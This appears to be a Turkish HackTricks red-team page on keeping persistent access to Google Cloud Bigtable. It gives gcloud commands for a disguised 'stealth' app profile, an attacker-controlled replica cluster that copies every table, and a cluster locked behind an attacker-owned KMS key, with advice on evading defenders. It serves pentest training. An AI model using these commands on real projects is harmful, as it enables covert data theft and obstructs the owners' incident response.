GCP - Bigtable Kalıcılık

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Bigtable

Bigtable hakkında daha fazla bilgi için bakınız:

GCP - Bigtable Enum

Saldırgan için özel App Profile

İzinler: bigtable.appProfiles.create, bigtable.appProfiles.update.

Trafiği replica cluster’ınıza yönlendiren bir app profile oluşturun ve Data Boost’u etkinleştirerek savunucuların fark edebileceği provisioned nodes’lara asla bağımlı olmayın.

Gizli app profile oluştur ```bash gcloud bigtable app-profiles create stealth-profile \ --instance= --route-any --restrict-to= \ --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile
–instance= –data-boost
–data-boost-compute-billing-owner=HOST_PAYS

</details>

Bu profil var olduğu sürece ona referans veren yeni kimlik bilgileriyle yeniden bağlanabilirsiniz.

### Kendi replika kümenizi sürdürün

**İzinler:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Az trafiğe sahip bir bölgede minimal düğüm sayısına sahip bir küme sağlayın. İstemci kimlikleriniz ortadan kalksa bile, **küme her tablonun tam bir kopyasını tutar**; savunucular açıkça kaldırana kadar.

<details>

<summary>Replika kümesi oluştur</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

Bunu gcloud bigtable clusters describe dark-clone --instance=<instance-id> ile izleyin, böylece veri çekmeniz gerektiğinde anında ölçeklendirebilirsiniz.

Replikasyonu kendi CMEK’inizin arkasına kilitleyin

İzinler: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt — saldırganın sahip olduğu anahtar üzerinde.

Klon oluştururken kendi KMS anahtarınızı getirin. O anahtar olmadan Google kümeyi yeniden oluşturamaz veya failover gerçekleştiremez; bu yüzden blue teams ona dokunmadan önce sizinle koordinasyon kurmalıdır.

CMEK korumalı küme oluşturun ```bash gcloud bigtable clusters create cmek-clone \ --instance= --zone=us-east4-b --num-nodes=1 \ --kms-key=projects//locations//keyRings//cryptoKeys/ ```

Projendeki anahtarı döndürün veya devre dışı bırakın, böylece replikayı anında kullanılamaz hale getirebilirsiniz (daha sonra tekrar açabilmenize izin verir).

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin